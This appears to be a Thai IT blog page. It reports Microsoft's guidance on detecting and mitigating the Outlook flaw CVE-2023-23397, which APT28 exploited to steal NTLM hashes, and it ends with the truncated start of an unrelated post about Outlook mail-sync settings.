Microsoft เปิดเผยในรายงานการวิเคราะห์ภัยคุกคาม พบว่ากลุ่ม Hacker ชื่อ APT28 ของรัสเซีย (หรือเรียกอีกอย่างว่า STRONTIUM , Sednit, Sofacy และ Fancy Bear) ได้ใช้ช่องโหว่ดังกล่าวเพื่อโจมตีองค์กรรัฐบาล กองทัพ พลังงาน และการขนส่งอย่างน้อย 14 แห่ง ระหว่างกลางเดือนเมษายน ถึงเดือนธันวาคม 2022
โดย Hacker จะใช้ Outlook notes ที่เป็นอันตรายเพื่อขโมย NTLM hashes โดยบังคับให้อุปกรณ์ของเป้าหมายเชื่อมต่อกับ SMB shares ที่ถูกควบคุมโดย Hacker รวมถึงข้อมูลประจำตัวที่ถูกขโมยเหล่านี้ จะถูกใช้สำหรับเข้าถึง และแพร่กระจายในเครือข่ายของเหยื่อ และเพื่อเปลี่ยน permissions บน Outlook เพื่อสามารถขโมยข้อมูลที่สำคัญในอีเมล

05/04/2566

Microsoft เผยแพร่วิธีการตรวจจับการโจมตีจากช่องโหว่ใน Outlook


    Microsoft เผยแพร่คำแนะนำเพื่อช่วยให้ผู้ใช้งานสามารถตรวจจับ หรือค้นหาสัญญาณของการโจมตีจากช่องโหว่ใน Microsoft Outlook
   CVE-2023-23397 (คะแนน CVSS 9.8/10 ความรุนแรงระดับ Critical) เป็นช่องโหว่ที่ทำให้สามารถยกระดับสิทธิ์ใน Outlook client for Windows และนำ NTLM Hash ไปใช้โดยที่ผู้ใช้งานไม่รู้ตัว โดยการส่งข้อความที่มีคุณสมบัติ extended MAPI ที่มี UNC path ไปยัง SMB share (445) ที่ถูกควบคุมจากผู้ไม่ประสงค์ดี โดยช่องโหว่ดังกล่าวส่งผลกระต่อระบบ Windows เท่านั้น


รายงานการตรวจจับการโจมตีจากช่องโหว่ CVE-2023-23397
    Microsoft ได้เผยแพร่เทคนิคต่าง ๆ เพื่อค้นหาสัญญาณของการโจมตีช่องโหว่ใน Microsoft Outlook ดังกล่าว รวมไปถึงวิธีการป้องกันจากช่องโหว่ดังกล่าว ไม่ว่าจะเป็น Script ที่เอาไว้ตรวจสอบว่า Exchange Server ได้ถูกโจมตีอยู่หรือไม่ รวมถึง IOC ต่าง ๆ ในกรณีที่ ผู้ไม่ประสงค์ดี ได้ลบร่องรอยการโจมตีออกไปแล้ว
    โดยแหล่งที่มาของ Indicators of Compromise (IOC) ที่บ่งชี้ถึงสัญญาณของการถูกโจมตีจากช่องโหว่ Outlook มาจากหลากหลายแหล่งเช่น firewall, proxy, VPN, RDP Gateway logs รวมถึงบันทึก Azure Active Directory sign-in logs for Exchange Online users และ IIS Logs for Exchange Server
    นอกจากนี้ยังรวมไปถึงจาก security team เช่น Windows event log และ Alert จาก Endpoint Detection and Response (EDR) เนื่องจากในเหตุการณ์การโจมตีช่องโหว่ จะมี IOC ที่เชื่อมโยงกับการโจมตีผู้ใช้ Exchange EWS/OWA รวมถึงการเปลี่ยนแปลง permission ในโฟลเดอร์ mailbox ซึ่งจะทำให้ ผู้ไม่ประสงค์ดี สามารถเข้าถึงอีเมลของเป้าหมายได้อย่างต่อเนื่อง

คำแนะนำในการป้องกันช่องโหว่ CVE-2023-23397
    นอกจากนี้ Microsoft ได้ให้คำแนะนำเกี่ยวกับวิธีการป้องกันการโจมตีจากช่องโหว่ดังกล่าว โดยแนะนำให้รีบทำการ Update Patch ด้านความปลอดภัยของ Outlook ทั้งใน Exchange Online, Exchange Server และ platform และ มาตรการอื่น ๆ ที่บริษัทสามารถใช้เพื่อป้องกันการโจมตีจากช่องโหว่ CVE-2023-23397 ได้ ดังนี้ :
  • หากในบริษัทมีการใช้งาน Microsoft Exchange Server ภายในบริษัท ควรทำการอัปเดตด้านความปลอดภัยโดยด่วนเพื่อป้องกันการโจมตีจากช่องโหว่ดังกล่าว
  • เมื่อพบเห็นการแจ้งเตือนที่น่าสงสัยหรือเป็นอันตราย ให้ทำการตรวจสอบให้แน่ใจว่าได้มีการใช้ Script เพื่อลบข้อความ หรือคุณสมบัติบางอย่างหรือไม่ รวมไปถึงเตรียมแผนการตอบสนองต่อเหตุการณ์ ในกรณีที่พบการโจมตี
  • ให้ทำการรีเซ็ตรหัสผ่านของบัญชีใด ๆ ที่สามารถเข้าสู่ระบบคอมพิวเตอร์ สำหรับผู้ใช้งานที่มีการใช้งานที่ผิดปกติ หรือมีการแจ้งเตือนด้านความปลอดภัยของบัญชีผู้ใช้งานรายนั้น
  • ใช้การตรวจสอบสิทธิ์แบบ multifactor authentication เพื่อลดผลกระทบของการโจมตี Net-NTLMv2 Relay (ใช้ในการป้องการโจมตีทางออนไลน์)
  • ปิดservice ที่ไม่จำเป็นใน Exchange
  • จำกัดการรับส่งข้อมูล SMB โดยบล็อกการเชื่อมต่อบนพอร์ต 135 และ 445 จากที่อยู่ IP ขาเข้าทั้งหมด ยกเว้นที่อยู่ในรายการที่อนุญาตให้ใช้งาน
  • ปิดใช้งาน NTLM บนเครือข่าย
วิธีการในการตรวจสอบ techcommunity.microsoft

08/10/2561

วิธีตั้งค่า ให้ Outlook Sync ข้อมูลอีเมล์จาก Exchange Server ที่ที่อายุมากกว่า 1 ปี

ได้รับแจ้ง จาก User ว่าไม่สามารถค้นหาอีเมล์ที่อายุเก่ากว่า 1 ปีได้
ตรวจสอบข้อมูลเพิ่มเติมพบกว่าเป็นการตั้งค่า ที่ Outlook ที่ใช้งานอยู่ได้ตั้งค่าไว้ว่าให้ Sync ข้อมูลแค่ 12 เดือน โดยสามารถปรับค่าดังนี้


เปิด Outlook แล้วเลือก File